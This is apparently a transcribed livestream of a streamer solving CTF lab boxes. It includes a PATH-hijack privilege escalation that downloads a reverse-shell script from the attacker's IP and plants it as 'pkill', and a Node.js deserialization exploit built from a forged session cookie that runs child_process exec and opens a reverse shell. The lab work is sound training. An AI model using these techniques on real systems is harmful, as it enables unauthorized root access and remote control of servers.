Oh, it killed my Python. Stop, rude. That is rude, sir. That is so rude. It's killing the It kills the Python process. That's very funny. So stty raw minus echo won't work if we're not in a tty. That is so rude. I am offended. That's kind of funny. The good news is that we can just like reload this and we get the shell back. Okay, so we just can't get a tty apparently. Let's look at upload.php and see what he did to it. Looks like we're just not going to be able to stabilize our shell. Cat upload.php. Okay. Maybe it did work. How come my upload didn't work? If this is... How come my upload didn't work? It looks the same to me, yeah. Upload.php, yeah. It's sending it to upload.php. This should be the same. Oh, you're right. It is in a comment, isn't it? Yeah, it's in a comment. So the PHP doesn't actually do anything. He didn't patch it. He just disabled the upload. Okay. All right. Well, now it makes sense, I guess. Yeah, he just took the upload out. Okay. I thought he would have patched it, but fine. All right. So, okay. Let's look at the home directory. Lachlan. We get user.txt. Splendid. We are seeing this bin directory here, which I bet you that he has rbash. Nope, bin sh. I thought he'd be an rbash with this bin, but we'll look at that here in a second. Let's get our... What happened to my music, by the way? How long has the music not been on? I don't know when the music stopped. Sorry about that. Okay. Where is... Okay. User.txt. How would you patch that? You would want to look at MIME type. You'd want several layers of filtering. You want to make sure that the .pdf is at the end of the file extension. You want to check for MIME type. I don't know. I've never had to harden one of these vulnerabilities, but I guess one way of doing it is just to make sure that the upload.php doesn't even work. We learned that yesterday, actually. Why fix vulnerabilities when you can just have your application not work? That's the same as fixing them, okay? If your application just doesn't work, technically, it has no vulnerabilities. Okay, there it is. We found it. Hi, Trisma. Okay, so let's look at this bin directory. Usually that's something you see when there's like a restricted shell, like rbash. Command lstech.la. Backup.sh. That seems like kind of a likely cron. What do you guys think? PETA website backup as requested by Her Majesty. Okay, so is this guy a Brit-bonger? Like in the service of the British Crown? Or is he a simp? Which one do you guys think it is? Like, is this guy a simp? Or... Well, technically all Brit-bongers are simps for the Queen. We know this, okay? All Brit-bongers are simps. We not all simps are Brit-bongers, but all Brit-bongers are simps. Okay? PETA website backup. Like, this is just the server echo. It's not a part of the... So my guess is we have to get to the Lachlan user. Before... My guess is we have to somehow get to the Lachlan user. Lachlan is a Scottish name. Okay, so we know it's a British simp. Is there a database here? I suspect not. No, this just looks like... Maybe he has no password? Maybe his password is password. No. Okay. We probably need to... Let's do find root tac perm tac 4000. 2 greater than dev null. Okay. Mount. All this looks normal. All this looks completely normal. Let's do find root tac user type F. God damn it. Lachlan. I want to see all files owned by user Lachlan. Type F. Bash history. Did we see if that was piped to dev null? We see this backup.sh. We do not have write access to backup.sh. Oh, bash history. There's just a fucking... I like, in so many of these, the bash history is symlink to dev null. I don't even... I feel like I'm not even looking at it anymore, but...
A fine addition to my collection.
That'll make a fine addition to my collection. How do you customize your terminal? There's lots of ways. I've done quite a few. You're looking at... mostly this is Cruel Retro Term. CRT. You can see it down here. You can install it. Do you have COVID again? I'm negative for COVID. It doesn't necessarily mean I don't have it, but all the tests I've taken are negative. I don't know what it is, but whatever it is, it's been nasty. The symptoms are different from a couple of months ago. Monkeypox? No, I do not have monkeypox. Okay, so we have cve.sh, cve patch.sh. Probably just patching PwnKit or something. Okay, so the actual password is this is the way. If you don't know, PassWD has you enter the current password, which is this, and then the new password twice. Okay, so the bash history is showing us the way. Okay, so Sue, Lachlan. Do you know the way? Maybe I have to SSH in. It looks like it worked, but it looks like since we don't have a TTY, it's not interactive. Yeah, that's our problem. We don't have a TTY, it's not interactive. So let's SSH in. Oh, yeah. Oh, yeah. He did try to symlink it. He tried to symlink it, and it didn't work. Is it this F? What does the F do? Or did he do it the other way around? Is it the... No, it's dev null first, and then... Oh, LS. Oh, classic. Okay. He put LS instead of LN. He did try to symlink it to dev null and failed. That's pretty funny. That is pretty funny. Okay, I like whoever created this box, I like them. They did a good job. This is funny. I'm entertained. It was a good box to get started on. We don't have a TTY, so we can't just sue. Because we can't do interactive processes. But we can SSH in, so there you go. So we are SSH'd in as Lachlan. Rude! rude. Fucking rude. So it's now he's just killing all my processes. You didn't say the magic word. Oh.
Say the magic word.
Please! God damn it! I hate this hacker crap.
I mean, in defense of John Hammond, I mean, maybe he just doesn't like dinosaurs. It's not like Jurassic Park is like a consummate hacker movie. It's not like we get such gem lines as it's a Unix system. I know this in there and stuff. By the way, if you couldn't tell, that was tongue-in-cheek. Jurassic Park is one of the most iconic hacker movies. One of absolutely the most iconic hacker movies, and it makes no sense why John Hammond does not lean into that, at least to me. I still haven't watched the movie Hackers. Honestly, not that great. I know I'm going against the grain by saying that. I don't love the movie Hackers, though. It's okay. I think I would like it more if I saw it as a kid. It's just going to kill us, but if we do bin bash, we're just quick with it. Okay, we're in bash. Is it going to kill us? Fuck. Okay, so it is killing. It is going to kill us. So whatever we do, maybe we just need to run one command as Lachlan. Okay? Maybe we just echo a command. We did see that backup.sh, right? Let's do neck. Let's get up a reverse shell again. Maybe we just echo something into that thing really, really fast. We just have to be fast with it, okay? Okay. So we did see Sneakers was more freaking. I have actually not seen Sneakers, so I can't speak for Sneakers. I suspect that this is being run as a cron. Maybe we can cat the cron tab. Let's do pspy to see exactly what's going on with the cron. Okay. We'll get pspy. Okay. God, I hope pspy actually works. This is gonna kill my shell, probably. It's okay. I just want to see what... It's gonna kill my shell when I Control-C. But we can get another one really easily. So I just want to see what cron jobs are being run here before I go down a roll. Eagle Eye. Eagle Eye was fine. It was okay. It wasn't great, okay? I've not seen Swordfish either, although I'm told that is a quintessential hacking movie. My favorite hacking movie has got to be Jurassic Park. It's simply got to be Jurassic Park. because it has two of my favorite things in it. It has hacking and it has dinosaurs. Those are two of my favorite things. And also, and this is key, it's a good movie. There's so many hacker movies that people just like it because people do hacking in it. And they're just bad movies. They're just bad. Like what's the James Bond movie? Is it Quantum of Solace? Is it Quantum of Solace or is it Spectre? I don't remember, dude. They all blend together. There's one of them where there's like where Q does all this insane hacking shit and there's like a web on the screen and shit. It looks like crap, but those movies are bad. We don't like, at least I don't like them. But it's so bad it's good if it makes sense. Yeah, it does. It's so bad it's good does actually. Oh, War Games is another good one. A good movie that has hacking in it. Yes. And realistic hacking. At least realistic back from the day. So what are we doing here? bin.sh for F and bin.ls. Do user bin echo nope. Okay. And then it does, and then it kills us. Dev PTS. So it's killing all shells. So what this is doing is just killing all shells. Yeah, it kills every PTY, essentially. It kills essentially every PTY, is what I'm getting here. Dev PTS contains all of the pseudo terminals that exist, and it's just killing all of them. It's echoing nope into them, and then it's killing them. Can you open a weird shell? I tried bash. It's just going to kill the PTS. If you have an interactive session, it's going to kill it. We can get an uninteractive session with the jerry-rig reverse shell. What we need to do, I believe, is echo a shell into... This is going to kill our shell, but we can get another one. So I think what we need to do... Get a reverse shell again. We need to go to home, Lachlan, bin. And we see this backup.sh, which is owned by Lachlan and writable by Lachlan. So we just need to... I'm pretty sure this is getting executed as part of a cron. cd etc cron d. Well, persistence seems like an interesting one. Okay, so yeah, here's the cron. Yeah, here it is right here. Oh, but this is commented out. Interesting. Oh, okay. All right, I get it. So what's happening here is, what do we? So what's weird here is that the. How is it echoing? Echo actually can't be hijacked in this way, because Bash has a built-in function for echo. Yeah. So what I'm thinking is a path hijack here. So in this case. The user, the cron, this is commented out. Backup.sh is commented out. So it looks like this is just another troll. So I'm glad we checked this before we went down the rabbit hole of backup.sh here. But what the person did do here is specify the path, and they put Lachlan bin at the front of the pack. So something, a binary in bin, in Lachlan/bin, is going to be executed before one in here or here. And he's using a relative path with pkill here. So we can use, we can make a malicious binary and have it execute for us. Interesting. Very interesting stuff. I applaud the creativity. Cthulhu.sh should work just again, right? Let's just change it to port 8444. Okay. Okay, so we want to generate to make our command here. So we want to, we're just going to have one big command because again, we have to be fast. So we're going to wget, let's do cd home Lachlan bin wget http://10.13.1069. Nice. Cthulhu.sh chmod plus x. Actually, why am I even doing that? We'll do it this way. It's fine. Chmod plus x Cthulhu.sh. And I think that should be all we need to do. I think that should be all we need to do. And we should get a reverse shell as root. Let's do... Let's just do over here. Let's do SSH Lachlan at 10.10.246.1. And the password, this is the way, 123. And we have to be fast, okay? We have to be quick. So let's make sure we copy that. Okay. All right. We're going to have to wait for it to execute a second time. Or did it actually work? Hang on. It did not. I feel like it should have worked. Oh, it needs to be PK. I'm just an idiot. I'm an idiot. I'm sorry. Good call. It needs to be PK.
What are you doing,
Shut up!
step bro?
Shut up! Don't what are you doing, step bro me. Okay, is it capital I? Is it capital I or capital O or lowercase o? To output to a particular file. I can never remember. I want to say it's lowercase o. Output file. Log messages. No, we don't want log messages. We want the... It is capital O. It is capital O. No, it doesn't matter. We can just move Cthulhu.sh to pkill. Okay. So now it's pkill. Congratulations. Just a brain fart there. Pkill. Chmod plus x pkill. Oh, we don't want to save it. Okay. Let's do that again. Let's make sure we're listening. We are. This is the way, 1, 2, 3. Okay, we paste it in. Did it work? It did not. I think we just barely missed it. I think it was killed while it was downloading. Did it work? Okay, that time it worked. Yay. We did it, chat. Way, yay. Okay, we did it. Alrighty. So anybody have any questions about how we did that? Very creative. Very creative. Very much liked it. Very fun. There you go. There's our, there that is. Does anybody have any questions about that before we move on to another box? We're going to do another box. Don't worry. That was a fun one. Whoever recommended that one, that was good. That was quite a fun one. Memes galore. We do love our memes on this channel, don't we? Marbles. Oh, do we want to do marbles? We can do marbles really quickly if you guys want to do some marbles. Where is Steam? If I can remember the controls, I swear to God. You're supposed to connect as Lachlan, not root. How? Because root is running the cron. We connect as Lachlan. Lachlan has write access to the file that that we need to write to, the folder that we need to write to. That's essentially how it works. But root is actually executing the code. So we'll do race, random, cosmic chaos. We do love cosmic chaos, don't we, chat? So I'm going to need to see exclamation point plays in chat if you would like to play. Exclamation point play. It doesn't cost you anything. Just for funsies. We're not giving anything away, but if you want to play, exclamation point play in chat, and your marble will be added. Lil Dee Dee with the 69. Nice. Tiggle Bitties. The Voodoo Puppet, thank you for the follow. Get your votes in, kids. Or get your, if you would like to play, get your exclamation point plays in there. I'll give you guys a few minutes while I'm just going to spin down all this stuff here. Yes, hi, honey. Yes, I know. You're a kitty. I'm aware. Yes. Come here. You want to say hi? Want to give you that? Okay, well, she's... I don't know what the deal is with this cat right now, okay? Okay, get your... you got 10 more seconds to get your exclamation point plays. Is it alt? Okay, it's alt. Is how it works, okay? All right, we're starting. Let it begin. The great gladiatorial match. In days of yore, gladiators would fight to the death in the great arena. And today, we fight with marbles. The battle begins. We don't know who's in front yet. Let's go to... Oh, shit. Oh, shit. Okay, who will come out in front? Who goes down the drain the fastest? The developer. And this is Azrio, closely followed by Northern Canuck. That is a oxymoron. Northern. Oh shit. Oh shit, what is happening? They're going around loop-de-loops. Who's in front? The developer, I believe, is in front. But this is Azrio just behind. Or they're neck and neck, essentially. This is Azrio. Looks like he might be a little bit further ahead. Oh my god, what is this purple crap? Oh my god! We're in zero gravity. This is Azrio. Oh no! This is Azrio! You missed it! Oh, he got past it, but now he's out of the running, I think. He just, unfortunately. Who's in front? Cave Dweller, out of nowhere. Cave Dweller. Oh, no. But is he going to be stopped? Okay, no. He's good. He's continuing. But other people are catching up. Technique is coming in. It's anybody's game. Technique has blown past the competition. Here he comes. Technique in the home stretch right now. Can he make it through the final challenge? So far, he seems to be doing well. Oh my god, he's skirting the outside for a second there. That's the real 5-head play. Is he going to make it? Coco Loco Popo just decides fuck this shit and throws himself to his doom. Owen Coates decides Coco Loco Popo has the right idea. And Technique with the victory. Oh no, don't listen, fellas, you don't need to jump to your death. Even if you win, nobody wins anything. At least not today. There's no reason to throw yourself to your death. Oh, Alien Wares. Night of Dark is coming in. Barry Duena is the little engine that could here. Is he going to make it to the end? Oh, it's a battle of the ages right here. Okay? Battle of the ages. How does that even happen? Listen. It just does, okay? Sometimes you just need to throw yourself to your death, and that's what's important. Barry Duena makes it, and Night of Dark coming in the last 7 seconds. Technique, well done, my friend. Your reward is nothing. But you get satisfaction. Satisfaction is what you get. All right, let's do another box. Okay. Let's do like an older box, I guess. Stego, I'm already turned off. Volnet Node. Okay, we'll put that one in there. Did you do Year of the Fox? Yeah, I believe I've done that one. But if you would like to see it again, I'd be happy to put that in. Why older box? Just because I'm tired of offering the same exact boxes every time. Just going to go older. Just to give a slightly different offering. There was Year of the Owl, which was Windows. And then somebody mentioned... What did somebody mention? Year of the Fox? I think that one was Linux. I'm putting a Windows box in there. Don't worry. Magician, maybe? And team, I guess. We'll put team in there. All right, get your votes in. Theseus? I can't do Theseus. It's asking not to stream it. Theseus says specifically don't stream it. People ask for it. I mean, I would do it. It says don't stream it, so. Listen, I'm trying not to get banned from these platforms, okay? I need these platforms for content. If I get banned, that's not good. Okay, so I have to toe the line with regards to what's allowed. Theseus asks for you to not stream it, so. Can you add Break Out the Cage? That one does not, have I done that one? I have done this one. I mean, I could do it again if you want. If you want to see Break Out the Cage, say so in the chat rather than in the poll. If you would like to see Break Out the Cage, with Interview from a Vampire, Nicolas Cage. Put it. I see Steg though. Simple are asking for it. I'm like, fuck it. It looks like it's just a meme box. It looks like it's a meme box. I'm okay with meme boxes, even if they're steganography. I don't like Steg. At least we know Steg is in it. If we know Steg is in it, that's half the battle. Part of the problem is you don't know Steg is in there, and it's not a thing you normally look for in the real world, so it's not in my workflow. Steg does suck. Yeah, I don't like it, but if it's fine for a meme box, if you want to do a meme box. Yeah, it looks like it's not like, it looks like just one person wants to see it, okay? Sorry, I put it in there. I gave you the option. What movie is that picture from? I believe that's Interview of a Vampire, but it's been a little while since I've seen it. All right, looks like Volnet Node was suggested. I will abide by this contractual obligation. Is it Volnet Node? There it is. Okay, after the previous breach, we have lore. Volnet Entertainment states it won't happen again. Can you prove they're wrong? Most likely, yes. Oh boy, JavaScript. Okay, let's get it going. TryHackMe's to QA my rooms. You feel like you've been waiting for a long-ass time for your rooms to be approved. They just require... Is it a Windows box running any software? Then it does too many... it requires too many resources. Sorry. Remember, press period for names if they don't stay. What do you mean by that, hate handles? Oh, you mean for... And marbles? Yeah, okay, I'll keep that in mind. I always forget the controls. But thank you for the 60 tickle biddies. Intel, Rye, and Philip Zenek. Thank you for the follow. Cthulhu Fountain to all of you. We're waiting for the box to spin up. My guess is we're going to be dealing with some kind of JavaScript Node vulnerability. So Node is also vulnerable to deserialization. So I'm not saying deserialization will be necessary. Again, deserialization is something that plagues basically all object-oriented programming languages. One is easy and one is a Mulder. That's good. We love Mulders. I'll do them on stream if you want me to. Giving our pickles to JS. It's not called pickle. It's only called pickle in Python. Python pickles. Python, for whatever reason, the powers that be in Python just decided that they wanted their they wanted their serialization library to be called pickle for some reason. Probably to keep people from using it because objectively pickles are disgusting. Okay. Pickles are amazing. Get the fuck out of here, dude. Pickles are not amazing. They are disgusting. They are unholy. They are sacrosanct. Volnet Node. I'm an avid pickle enjoyer. Well, you're just wrong. You're incorrect. You are incorrect. Sacrosanct means holy. It doesn't sound like it means holy, but fine. They are not holy. They are unholy. Unsacrosanct. Are you happy now, Zombie Foo? Fucking English major up in here, okay? Don't ever go. Why would I ever go to the pickle factory? Why in the name of God would I ever go to that unholy place? You ever hear of honey pickles? Sorry, I almost threw up in my mouth a little bit there. Awesome Cali setup. Hey, thanks, man. Appreciate it. It took a little doing to set it up this way, but it's very doable. Okay, what's the IP address of this machine? Yes, we all want to give Riley our pickles. I know. Everyone, those who missed the opportunity to give Riley their pickles are very upset. In fairness, I did warn you that a CTF was coming. Okay. We begin. We see 8080. I love eating pickles when drunk for some reason, because that's the only time they can be even halfway taste decent. And they don't. They taste like shit. Okay, we see 8080. Let's check out 8080 while we're waiting. SSL. Oh, it's trying to do SSL. Okay. Volnet Entertainment confirms data breach. Volnet Entertainment confirms the recent data breach on one of their servers. By the way, I'm going to go ahead and set up my burp because I anticipate that burp will be necessary for this box. Let's do 20 font size. Let's make it bigger so you guys can see it. And then I make it smaller off stream because I hate it when it's big like this, but the things I do for chat. Let's look at the proxy options. This needs to be 8081. Okay. Let's change this to burp. Is it working? Yeah, it's working. Okay. So we're intercepting with burp now. Stage that such a breach will happen again, but can the customers feel safe? Maybe it's time for them to move on. Let's hope that why are they putting this is on their website. VulnNet. This is on your website. Fire your marketing people. This is egregious. The top news story on their website is how shitty their security is and saying that maybe the customers should move on or whatever. Fire the marketing people, okay? Listen, I'm not even a marketing person, but I promise you that there are better people out there to do than whoever is responsible for this. Tilo Mitra, okay? Yeah, stock price is dropping quick because of their website. As long as people are the ones writing code, but then who will write the code of the people who write the code? Ah, yes. You know this person's a hacker because he has a bunch of stickers all over his laptop. I put all kinds of I use DEF CON as a means of acquiring stickers, and I covered my laptop in stickers. That's how you know I'm a real hacker now because I have stickers all over my laptop. Okay, we see a login page. Log in, test at test.com, test. Nothing. Test at test.com, test again. Let me back. Is it just gonna take me back? Okay, that takes me back. Okay, we're not sending a post request. This looks interesting. Let's have a look-see at that. I thought for a second this would be a JWT, but I don't think it's a JWT. I do not think that's a JWT. It is URL encode. Let's send this to repeater. It looks like let's just send this to repeater. Let's un-URL encode this with Control-Shift-U. And then we can decode it with you could also use decoder for this. I don't know why I'm doing it this way. So it looks like this session cookie is how they're keeping track of is how they're keeping track of sessions, and it looks like this is not signed in any way. Initially I thought this might be a JWT, but it's too short to be a JWT. JWTs are typically signed, so you can't just modify them like we can probably do here. Here we can just modify this, I would think. So let's just paste that in, and we can change the username to, I don't know, admin. IsGuest, we can set isGuest to false. So maybe it'll think we're authenticated. Pipe that into base 64. Okay. Well, first let's do this. What does it do if we just chop off part of the session cookie? I'm curious if it'll give us any errors. We do get some errors, some useful... Ooh. Wee woo, wee woo, wee woo, wee woo. So we do have an unserialized, we do have what appears to be a unexpected end of JSON input. It looks like whatever we put into this cookie is being passed to the unserialized method, which is why so serial will not work for this, and I'm going to explain why here in a second. So we do have a deserialization vulnerability. Node is vulnerable. Basically, again, any object-oriented programming language is going to be vulnerable to deserialization vulnerabilities. At least most of them. I don't know if C++ have any. C++ might. But the point is that the point is that JavaScript, Python, Java, C#, .NET. All of these languages are vulnerable to their own brand of deserialization vulnerabilities. So it looks like whatever this cookie is being passed to unserialize, and it is every language has these. Yeah, it's a very common thing. It's not specific. All I'm trying to say is it's not specific to JavaScript. It's not just Python pickles. Now let's try it with the full. This is something you should always do, by the way. If you see a session token like this, you should always just, like, truncate it and see if you get, like, an interesting error. Like triggering interesting errors is, like, half of enumeration. Like, in this case, we see that we get a detailed stack trace of what's going on here. And we get a lot better indication of what we can potentially do to exploit this. Let's also pass it a legitimate cookie. We are going to need to URL encode that, I think. Control U. Send. We don't get an error. Welcome admin. Oh, it just says welcome guest. So we only put our username there. It doesn't look like we're actually logged in, although we might. We might be. Let's run GoBuster just to see if there's anything else. After that, we're going to want to look at, while GoBuster is running, we're definitely going to want to look at Node.js deserialization payloads. So does anybody need a primer on how deserialization works and why it can be vulnerable? Does everybody understand deserialization, or do I need to explain it? I'm fine explaining it. That's why we're here. Does anybody need deserialization explained to them? If it was Newbie Tuesday, I'd just launch right into it. Maybe template injection. No, it's definitely serialization. You can see it. Please. Okay, so serialization. Okay, so when you have an object-oriented programming language, okay, this is specific to object-oriented programming languages. Okay, a lot of times you have a need for a program to turn an object, and all an object is really in an object-oriented programming language is it's just a blob of data in memory that's structured in a certain way. Okay. It's just a blob of data in memory that is structured in a particular way. Okay? So, sometimes you have a need to send an object somewhere else. Either over the network or over a named pipe or to the same application, just like in a different part of the application or something like that. Sometimes an object-oriented programming language needs to either send an object or receive an object from somewhere else. Does that make sense? Is everyone following me so far? Sometimes applications just need to be able to send objects around. But objects cannot be easily sent. Okay? Again, they're just blobs of data in memory. And sometimes the receiving instance won't know what that object is. Or won't know how to... You can't just send them the blob of data from memory. Okay? You can't do that because different memories are structured different ways. Like if you have a Windows machine, it's going to structure its memory differently than a Linux machine. And so on and so forth. Different browsers as well, generating different types of software are gonna structure their memory differently. You can't just send a blob of data to some other program and have it work okay. So, what is the solution? What is the solution? The solution is serialization. Okay, objects are weird. They are very weird. Okay, but the best way to understand what an object is just a blob of data in memory that has various attributes and sometimes methods. Again, this is specific to object-oriented programming languages. Now, if you need to send an object somewhere else, serialization is the way to do that. Basically, you're going to take your object and you're going to translate it into a stream of binary data that can easily be unserialized on the other end by the receiving application and thus replicate that object inside of the new place. Does that make sense? Serialization is a way to send an object from one application to another application. Does that make sense? So that's what's happening here. This session cookie is serialized data, and we're sending it to this application that will then deserialize it so that it understands our user permissions. Does that make sense, everybody? If it doesn't, ask questions. I have a bachelor's degree in cyber engineering, and I don't know it. Dude, I told you, objects are confusing. Okay? Just understand serialization is sort of a way to send objects from one place to another. Okay? It's a way to translate objects into a state where they can be sent somewhere else, and then unserialized and made back into their typical object form. Fantasy. Are you listening? I literally just finished explaining it. People in chat, can you inform Fantasy Suhal of why you would serialize an object? Like, I literally just explained it. You're going to want to back up a little bit. But who puts a JSON blob in a cookie seems like a made-up vulnerability. I mean, JSON data does need to be unserialized. I've seen cookies that are as insecure as this. Even more insecure. Again, one reason JWTs are recommended is because they're signed. The problem with this cookie is not that it's serialized. It's serialized. The problem is that it's signed, or it's not signed. If it were signed, that would mean we can't just modify it arbitrarily. Does that make sense? I've seen plain text cookies with password. Yeah, dude, you'll see all kinds of crazy shit. The problem is not the serialization itself, but that the serialization, it's A, unsigned, and B, the serialization is handled without checking the type. So, does everyone follow as far as what serialization is at a basic high level and why you would serialize an object? Is everyone following? The short version is you would serialize an object in order to translate it into a form where it can be sent somewhere else. And then unserialized and turned back into its normal object form. Objects can't just be sent over the network in their normal... Or stored, yes. Or stored. The objects cannot just be sent over the network or stored, and then you can't just reload that object back into the application. That's not how it works. You need to serialize it and then unserialize it when the application receives it. Okay? So Where the vulnerability comes in is that any object can be serialized, not just the objects you're expecting. So if you were to deserialize, if you're taking user-controlled data, like this cookie, and deserializing it without checking to see what type of object it is, and you could potentially deserialize an object. It's fantasy. I literally, in plain English, just explain. Chat, am I wrong? Am I wrong? Am I wrong that I literally just explained it? That I literally, I didn't just explain what serialization is. I explained why. Like, does everyone else understand why serialization? Why serialization? I mean, only twice. You would serialize something to send it somewhere else or store it. You would serialize an object in order to send it somewhere else or store it. It's hurting. It hurts, chat. Okay? I'm not explaining it again. Okay? Fantasy, if you still don't understand why you would serialize something, back up a couple of minutes and watch the whole explanation again. So, I don't remember saying store, just send. Yeah, you store. Typically, you would send it, but also store it. Yeah. Or store it in cookies. Okay, so maybe the deeper... Oh, it's a philosophical question. Like, why are we on this planet just storing objects as binary streams? Okay. So, if you accept an object and a serialized object and deserialize it without knowing what kind of object it is, you can you can cause unexpected behavior because you're creating an object inside of your application without really knowing what that object is. And if there is an object that, say, executes code, when it's deserialized, then it'll execute code at deserialization. Serialization does not necessarily mean to a string. I didn't say it meant to a string. I said it meant to I said a binary stream, not a string. So base 64 is no. Base 64 is not serialization. Base 64 is just a form of text encoding. It is not serialization. So we need to create an object here that executes code upon deserialization. Okay? So I don't know how to do that by default, so we're going to have to look it up. It's time to start the research. Okay, Node.js deserialization exploit. Sure. Untrusted data passed into the unserialized function in a Node serialized module can be exploited to achieve arbitrary code execution, passing a serialized JavaScript object with an immediately invoked function expression. So this means that we're going to produce an object which has a method in it that is automatically executed upon object creation. So when the object is deserialized, the object is going to be created in memory, and then this immediately invoked function expression is going to be executed. Now, what is serialization? Why is serialization? I don't think you understand what I'm asking. Buddy, you're explaining what is serialization. I want to know why there is a need to do all of this, not how it works. I feel like I understand exactly what you're asking and that I answered it several times. Unless you're looking for like a more philosophical question of like, why are we here on this planet right now? Just blobs of flesh serializing objects to send to one another. Like, you know. Okay. Sample Node.js to imitate. Okay, great. So this is... Okay, so it has like a cookie here and everything. So this looks like... is this the code that the box creator used? That'd be fucking hilarious. Is this the code the box creator used? Okay, but something very similar to this. Something very similar to this is the code that the box creator used. Java, PHP, Ruby, and Python have a fair share of deserialization bugs. So does .NET. Okay. Okay, so we're serializing. I created the following JavaScript object and passed it to the serialize function. Okay, I'm gonna have to install Node. I'm gonna need to install Node. You guys might have to help me a little bit in figuring out how Node works again. I've used Node plenty of times before, but I don't use it often enough to remember. Install Node. Is it Node.js? I already have it. So Node. Okay, cool. All right, should be easy enough. Exit. Exit. Oh my god. Dot help. Is it dot exit? It is dot exit. Fuck. Boy, I'm doing so well with Node already. Node and me are best friends, okay? Control C, yeah. Is Node the new Vim? Apparently, yeah. I'm just trapped in it. So it looks like we're just gonna have to execute this code by the looks of things. We can use JavaScript, which gives the following output. Now we have a serialized string that we deserialize, but the problem is the code execution won't happen until you trigger the function corresponding to the RCE property of the object. Later, I figured out that... So, this will create an object, which is vulnerable. Or an object, but it won't execute immediately, which is not ideal. If you use the IFE bracket after the function body, the function will get invoked when the object is created. It works similar to a class constructor in C++. So you have to include this after. Following output was obtained. Tried adding a bracket after the function body, the previously serialized string, and passed it to unserialize, and luckily it worked, so we have the exploit payload. Okay, so we need to do this and then add the parentheses. Okay, so we do okay. So we're gonna have to do like a
hunter must hunt.
Okay, so let's produce a payload first. Let's do this. Okay, let's do this first.
A hunter must hunt.
Kate,
Al4Z happy.
Serial.js. Okay, so we're just going to copy this and let's just execute it as is before we start modifying and doing some crazy shit to it. Okay, node serial.js. Module not found. Oh, cannot find module. Do it. npm install node serialize. Okay. One critical severity vulnerability. That's good. Makes me feel good in my pants. Okay, good. So we do have... Is it unserializing? Wait a minute. VR Linux with a 6 months re-indoctrination into the cult. Welcome back to the All Has Red team. Crypto API with the first time Bezos indoctrination into the cult. Welcome, Crypto. Good to have you in our passionate club of cephalopod enthusiasts. Shane Saw, Airplane Mood, and Ataric Games. Thank you for the follow. All right, maybe I just didn't read this completely. Function corresponding to RCE properties immediately invoked when object Y is created. So the serialization doesn't seem to work. That's what we found out. So we need to do we need to do the kind without the. So it won't serialize it with that little parentheses, apparently. There we go. So we have that, and then what do we do to it? We use the IIFE bracket F, the function body. So where do we put it? Just right at the end? Fuck. Maybe it will work without... Is it? Oh, there's a new line in there. Okay, we have to bait... I can't base 64 encode it. I have to add the thing. I mean, I guess I could if I was better at JavaScript, just add the parentheses onto the end. How do I want to do this? Let's just do it. Let's just open up another Kate tab here. Let's paste this in here. And I think that parentheses go right there. Yes. Okay. So we copy all of that. And we can move into decoder. Its encode is base 64. Okay, so there is a base 64 encoded payload. All this is going to do is list the... I'm curious if we'll get output. I'm curious if it will give us output. Let's control U. 304 not modified. It gives us a redirection. Or it does, it's not a redirection. It's just... It looks like we caused something to happen. It does look like we caused something to happen. So instead, we're going to want to do... Let's open up Kate again. Let's do ping taxi 3 10.13.10.69. Nice. So we're just going to have it ping us. I thought maybe we'd get the output because it says console.log here. But apparently it just doesn't work for us. Isn't the 304 nothing changed? I guess that means. I guess that's what it means, yeah. Who even keeps track of that stuff? Dude, why is this look so different? This isn't right. This just says LS. Did it not save? What is going on? Oh, I'm only echoing. I'm an idiot. There we go. I was only echoing. Don't. What are you doing, step bro me? Don't do it. I forbid it. I forbid you to what are you doing, step bro me. I'm sick, okay? Be nice. Be nice, chat.
What are you doing, step bro?
Listen, I'm not proud of who I am, okay? All right, we have a payload here again, and we need to start TCP dump before we send it. Okay. Control U. Let's sudo TCP dump. Okay, we're listening for pings. And we don't get anything. So something is broke. Oh, because I didn't put the... Oh, I didn't mean to start Wireshark. Go away. I forgot to put the parentheses. I'm sick of your sickness? Dude, I'm sick of my sickness, okay? No one is more sick of their sickness than of my sickness than I am. I assure you of that. It needs to go before inside the quotes, right? Yeah. Okay, so we'll encode as base 64. Okay, I think it automatically updated. I just wasn't sure about that, and I didn't want to risk it. Paste. I don't think this needs to be URL encoded at all, but we're going to do it anyways. And now we send it. So we can get it to ping us. Does that make sense? Are you still fighting COVID? No, I had it like months ago. I'm negative for COVID. I don't know. I don't know what this is. I thought it might be strep throat or something. Whatever it is, it sucks. Whatever it is, it sucks. The symptoms were different than when I had COVID the first time. So I don't think it's COVID, but I don't know for sure. It could be COVID. All right, so now we just put a reverse shell in here, and it should work okay. Use hack tools to generate a new reverse shell for us. We do have... I'm going to put that in double quotes. Let's put bin bash here. bin/bash. Save it. Node it. Get that. See, this is the kind of, by the way, this is the kind of article that I really like to read that fully explains the whole thing that's going on. And also, like, it's also simple and easy to follow, like, when I'm on the job and trying to do this stuff in real time. Like, that's the kind of article I like. Because I don't want to sit here and read a whole bunch of theory. I want to get right to it, okay? I want to get into the nitty-gritty. Okay, remember we do need to add the parentheses at the end to make sure that the function is executed. Okay, we go back to repeater. Yes.
Hackerman.
I'm in. All right, we did it, boys. Does anybody have any questions about that? Does anybody have any questions about all that stuff we just did? So we created, so this application is accepting serialized objects in the session cookie, okay? And when you request a page, it is putting that session cookie into deserialize, into unserialize, it's called over here. Unserialize creates your session cookie object in the target. in the application. I just finished the last box of my OSCP lab, and boy, it was a pain. Sufferance is aptly named. That was one of my favorite boxes in the lab. Congratulations, Jiffaram. I think you're ready for the exam then. So it deserializes it in order to get your session information into application memory. Okay? But the problem is that the session cookie is controlled by us. We control the session cookie, so we can send it a malicious object. In this case, we're sending it an object called Y. The object is called Y. Not as in why are we here, but like why the object is called Y. And the Y object has a function in it that executes code. This is the child process exec, the classic Node.js code execution here. And if you put these parentheses at the end of it, that means that the function is immediately executed upon object creation. Okay? Y is in Y serialized. Don't start that up again, okay? So we pass it an object that has a function that will execute code on our behalf, and we include these parentheses to indicate that Node should immediately execute that function upon object creation. Does that make sense? Does that make sense to everybody? Is there anyone who doesn't understand that? We good? And we managed to just pass it a reverse shell. Pretty simple stuff. Can you put a link to that article? Yeah, I can. This was, I mean, I literally just Googled Node.js deserialization exploit, and it was the first response. Where did you see that it uses serialized data? That's easy. If you just like cut some off the cookie, you'll see you get an error here. And it references unserialized. You see that? Like, you should always do this with cookies. With cookies, whenever the application accepts binary data, like in base64 like this, just cut it in half one time and send it and see if you get any interesting errors. You'll find that a lot of pen testing comes into just making interesting errors come up, so that you can get more information about how the application works. In this case, we get the critical information that the unserialized function is being used on this input. Does that make sense? Okay, so we witch Python 3, Python 3-c, import pty, pty.spawn, bin bash. Okay, Control Z to background, stty, raw minus 